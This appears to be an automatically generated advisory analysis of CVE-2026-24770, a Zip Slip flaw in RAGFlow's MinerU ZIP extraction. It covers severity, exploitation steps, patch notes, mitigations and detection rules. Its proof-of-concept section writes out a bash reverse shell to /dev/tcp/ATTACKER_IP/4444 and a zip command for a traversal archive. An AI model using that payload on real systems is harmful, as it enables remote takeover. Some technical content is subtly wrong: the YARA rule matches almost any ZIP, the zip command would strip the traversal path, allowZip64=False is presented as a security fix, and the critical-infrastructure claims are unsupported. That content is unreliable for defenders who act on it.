Description
RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. In version 0.23.1 and possibly earlier versions, the MinerU parser contains a "Zip Slip" vulnerability, allowing an attacker to overwrite arbitrary files on the server (leading to Remote Code Execution) via a malicious ZIP archive. The MinerUParser class retrieves and extracts ZIP files from an external source (mineru_server_url). The extraction logic in `_extract_zip_no_root` fails to sanitize filenames within the ZIP archive. Commit 64c75d558e4a17a4a48953b4c201526431d8338f contains a patch for the issue.
EPSS Score:
0%
Comprehensive Technical Analysis of EUVD-2026-4714 (CVE-2026-24770) – "Zip Slip" Vulnerability in RAGFlow
1. Vulnerability Assessment and Severity Evaluation
Vulnerability Overview
EUVD-2026-4714 (CVE-2026-24770) is a critical "Zip Slip" vulnerability in RAGFlow, an open-source Retrieval-Augmented Generation (RAG) engine developed by Infiniflow. The flaw resides in the MinerU parser, specifically in the _extract_zip_no_root method, which fails to properly sanitize filenames within ZIP archives during extraction. This allows an attacker to overwrite arbitrary files on the server, leading to Remote Code Execution (RCE).
Severity Evaluation (CVSS v3.1: 9.8 – Critical)
The CVSS v3.1 base score of 9.8 reflects the following key metrics:
- Attack Vector (AV:N): Exploitable remotely over a network.
- Attack Complexity (AC:L): Low complexity; no special conditions required.
- Privileges Required (PR:N): No authentication needed.
- User Interaction (UI:N): No user interaction required.
- Scope (S:U): Impact confined to the vulnerable component.
- Confidentiality (C:H): High impact (arbitrary file read/write).
- Integrity (I:H): High impact (arbitrary file overwrite).
- Availability (A:H): High impact (potential system compromise).
This classification aligns with critical vulnerabilities that enable unauthenticated RCE, posing severe risks to affected systems.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Mechanism
The vulnerability arises from improper path traversal validation when extracting ZIP archives. An attacker can craft a malicious ZIP file containing:
- Relative path traversal sequences (e.g.,
../../../etc/passwd). - Absolute paths (e.g.,
/etc/cron.d/evil). - Symlinks pointing to sensitive files.
When the MinerUParser processes such a ZIP file (retrieved from mineru_server_url), the _extract_zip_no_root method fails to sanitize filenames, allowing:
- Arbitrary File Overwrite: Attacker-controlled files are written to unintended locations.
- Remote Code Execution (RCE):
- Overwriting cron jobs (
/etc/cron.d/). - Modifying web server configurations (e.g.,
.htaccess,nginx.conf). - Injecting malicious scripts (e.g.,
/var/www/html/shell.php). - Replacing system binaries (e.g.,
/usr/bin/sudo).
- Overwriting cron jobs (
- Privilege Escalation: If the RAGFlow service runs with elevated privileges (e.g.,
root), the attacker gains full system control.
Exploitation Steps
- Host a Malicious ZIP File:
- Craft a ZIP archive with a file named
../../../tmp/exploit.sh. - Include a payload (e.g., reverse shell, web shell).
- Craft a ZIP archive with a file named
- Trigger ZIP Extraction:
- The attacker forces RAGFlow to fetch the ZIP from
mineru_server_url. - The vulnerable
_extract_zip_no_rootmethod processes the archive.
- The attacker forces RAGFlow to fetch the ZIP from
- Achieve RCE:
- The malicious file is written to the target location.
- Execution is triggered (e.g., via cron, web request, or service restart).
Proof-of-Concept (PoC) Considerations
- A minimal PoC could involve:
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' > payload.sh zip malicious.zip ../../../tmp/payload.sh - The attacker then hosts
malicious.zipon a controlled server and manipulatesmineru_server_urlto fetch it.
3. Affected Systems and Software Versions
Vulnerable Software
- Product: RAGFlow (open-source RAG engine)
- Vendor: Infiniflow
- Affected Versions: ≤ 0.23.1 (including earlier versions if MinerU parser is present)
- Component: MinerUParser (specifically the
_extract_zip_no_rootmethod)
Attack Surface
- Default Installations: Any RAGFlow deployment using MinerU for ZIP extraction.
- Cloud/On-Premise: Both cloud-based and self-hosted instances are vulnerable.
- Integration Risks: If RAGFlow is embedded in larger AI/ML pipelines, the attack surface expands.
4. Recommended Mitigation Strategies
Immediate Actions
-
Apply the Patch:
- Upgrade to the latest version of RAGFlow (post-commit
64c75d558e4a17a4a48953b4c201526431d8338f). - The patch introduces proper path sanitization in
_extract_zip_no_root.
- Upgrade to the latest version of RAGFlow (post-commit
-
Temporary Workarounds (if patching is delayed):
- Disable MinerU Parser: If not critical, disable ZIP extraction functionality.
- Network-Level Protections:
- Restrict
mineru_server_urlto trusted sources via firewall rules. - Implement rate limiting to prevent mass exploitation attempts.
- Restrict
- File System Hardening:
- Run RAGFlow with least-privilege permissions (e.g., non-root user).
- Use chroot/jail environments to limit file system access.
- Enable SELinux/AppArmor to restrict file operations.
-
Input Validation:
- Manually validate ZIP filenames before extraction (e.g., reject
../,/, or symlinks).
- Manually validate ZIP filenames before extraction (e.g., reject
Long-Term Security Recommendations
- Secure Coding Practices:
- Use secure ZIP extraction libraries (e.g., Python’s
zipfilewithallowZip64=Falseand path validation). - Implement sandboxing for untrusted file operations.
- Use secure ZIP extraction libraries (e.g., Python’s
- Dependency Management:
- Regularly audit third-party dependencies (e.g., MinerU) for vulnerabilities.
- Runtime Protections:
- Deploy Web Application Firewalls (WAFs) to detect path traversal attempts.
- Use File Integrity Monitoring (FIM) to detect unauthorized file changes.
- Incident Response Planning:
- Develop a playbook for RCE incidents involving RAGFlow.
- Monitor for unusual file modifications or outbound connections from the server.
5. Impact on the European Cybersecurity Landscape
Broader Implications for EU Organizations
-
Critical Infrastructure Risks:
- RAGFlow is used in AI-driven decision systems, including healthcare, finance, and government applications.
- A successful RCE could lead to data breaches, service disruption, or espionage.
-
Compliance and Regulatory Concerns:
- GDPR (Art. 32): Failure to patch may result in non-compliance with security obligations.
- NIS2 Directive: Critical entities must ensure supply chain security, including open-source components.
- ENISA Guidelines: The vulnerability aligns with ENISA’s top threats (2023), particularly supply chain attacks and RCE exploits.
-
Supply Chain Risks:
- Many EU organizations integrate open-source AI tools like RAGFlow into their workflows.
- A single unpatched instance could serve as a lateral movement vector in a larger attack.
-
Threat Actor Interest:
- APT groups (e.g., Russian/Chinese state-sponsored actors) may exploit this for espionage.
- Ransomware operators could use RCE to deploy locker malware.
EU-Specific Mitigation Strategies
- CERT-EU Coordination: Organizations should monitor CERT-EU advisories for updates.
- National CSIRTs: Engage with national cybersecurity agencies (e.g., ANSSI, BSI, NCSC) for guidance.
- Open-Source Security Initiatives: Support EU-funded projects (e.g., OpenSSF, Sovereign Tech Fund) to improve open-source security.
6. Technical Details for Security Professionals
Root Cause Analysis
The vulnerability stems from insufficient path sanitization in the _extract_zip_no_root method of the MinerUParser class. Key issues:
- Lack of Path Normalization:
- The code does not resolve relative paths (e.g.,
../../) before extraction.
- The code does not resolve relative paths (e.g.,
- No Symlink Handling:
- ZIP archives containing symlinks can bypass directory restrictions.
- Unrestricted File Permissions:
- Extracted files inherit the process’s permissions, potentially allowing writes to sensitive locations.
Patch Analysis (Commit 64c75d558e4a17a4a48953b4c201526431d8338f)
The fix introduces:
- Path Sanitization:
- Uses
os.path.abspath()andos.path.realpath()to resolve paths. - Rejects files attempting to traverse outside the extraction directory.
- Uses
- Symlink Detection:
- Checks for symlinks before extraction.
- Strict Directory Validation:
- Ensures extracted files remain within the intended directory.
Detection and Forensics
- Indicators of Compromise (IoCs):
- Unusual files in
/tmp/,/var/www/, or/etc/. - Suspicious cron jobs (
/etc/cron.d/). - Unexpected outbound connections from the RAGFlow server.
- Unusual files in
- Log Analysis:
- Check for ZIP extraction events in application logs.
- Monitor for failed path traversal attempts (if logging is enabled).
- Memory Forensics:
- Use Volatility or Rekall to detect injected payloads in memory.
Exploitation Detection Rules
- YARA Rule (for malicious ZIP detection):
rule ZipSlip_RAGFlow { meta: description = "Detects ZIP files with path traversal in RAGFlow" reference = "CVE-2026-24770" strings: $traversal1 = "../../" nocase $traversal2 = "..\\..\\" nocase $absolute = "/" nocase condition: uint32(0) == 0x04034b50 and any of them } - Snort/Suricata Rule (for network detection):
alert tcp any any -> $RAGFLOW_SERVERS $HTTP_PORTS (msg:"Possible CVE-2026-24770 Exploitation - ZIP Slip in RAGFlow"; flow:to_server,established; content:".zip"; http_uri; content:"../../"; depth:10; within:100; classtype:attempted-admin; sid:1000001; rev:1;)
Conclusion
EUVD-2026-4714 (CVE-2026-24770) represents a critical RCE vulnerability in RAGFlow due to improper ZIP extraction handling. The flaw is easily exploitable by unauthenticated attackers, posing severe risks to European organizations leveraging AI-driven systems. Immediate patching, network-level protections, and runtime hardening are essential to mitigate this threat. Given the broad adoption of RAGFlow in EU critical infrastructure, this vulnerability warrants urgent attention from security teams, CERTs, and regulatory bodies.
Recommended Next Steps:
- Patch immediately (upgrade to the latest RAGFlow version).
- Audit all RAGFlow deployments for signs of compromise.
- Implement compensating controls (WAF, FIM, least privilege).
- Monitor for exploitation attempts via SIEM/log analysis.